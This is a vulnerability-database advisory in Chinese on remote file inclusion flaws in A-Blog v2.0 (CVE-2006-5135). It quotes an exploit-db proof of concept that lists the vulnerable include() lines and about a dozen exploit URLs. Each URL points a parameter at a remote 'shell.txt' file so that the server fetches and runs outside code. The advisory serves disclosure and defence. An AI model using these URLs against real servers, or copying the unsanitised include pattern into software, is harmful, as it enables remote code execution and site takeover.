A-Blog 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111153 漏洞类型 输入验证
发布时间 2006-09-27 更新时间 2006-10-18
CVE编号 CVE-2006-5135 CNNVD-ID CNNVD-200610-050
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2442
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-050
|漏洞详情
A-Blog2中存在多个PHP远程文件包含漏洞。远程攻击者通过以下文件参数中的URL执行任意PHP代码:(a)sources/myaccount.phpthe中的(1)open_box、(2)middle_box和(3)close_box参数;(b)navigation/search.php和(c)navigation/donation.php中的(4)navigation_end参数;以及(d)navigation/latestnews.php和(e)navigation/links.php中的(6)navigation_start和(7)navigation_middle参数。
|漏洞EXP
#==============================================================================================
#A-Blog v2.0 Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
#A-Blog
#http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download
#Version : v2.0
#
#================================================================================================
#Bug in :
#/navigation/links.php
#/navigation/search.php
#/navigation/donation.php
#/navigation/latestnews.php
#/sources/myaccount.php
#
#================================================================================================
#Vlu Code :
#include("$navigation_start")
#include("$navigation_middle")
#include("$navigation_end")
#include("$open_box")
#include("$middle_box")
#include("$close_box")
#================================================================================================
#
#Exploit :
#
#http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
#http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?

#================================================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#and all members in XP10_hackEr Team
#WWW.XP10.COM
==================================================================================================

# milw0rm.com [2006-09-27]
|参考资料

来源:XF
名称:ablog-multiple-file-include(29218)
链接:http://xforce.iss.net/xforce/xfdb/29218
来源:BID
名称:20238
链接:http://www.securityfocus.com/bid/20238
来源:MILW0RM
名称:2442
链接:http://www.milw0rm.com/exploits/2442
来源:MILW0RM
名称:2442
链接:http://milw0rm.com/exploits/2442